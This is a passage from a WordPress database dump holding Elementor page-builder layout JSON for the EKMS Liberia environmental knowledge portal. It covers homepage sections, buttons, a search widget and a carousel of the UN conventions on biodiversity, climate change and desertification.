ize\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19052,2790,'_elementor_version','2.7.5'),(19053,2790,'_elementor_template_type','wp-page'),(19054,2790,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19058,2791,'_wp_page_template','default'),(19059,2791,'_elementor_edit_mode','builder'),(19060,2791,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"200\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by 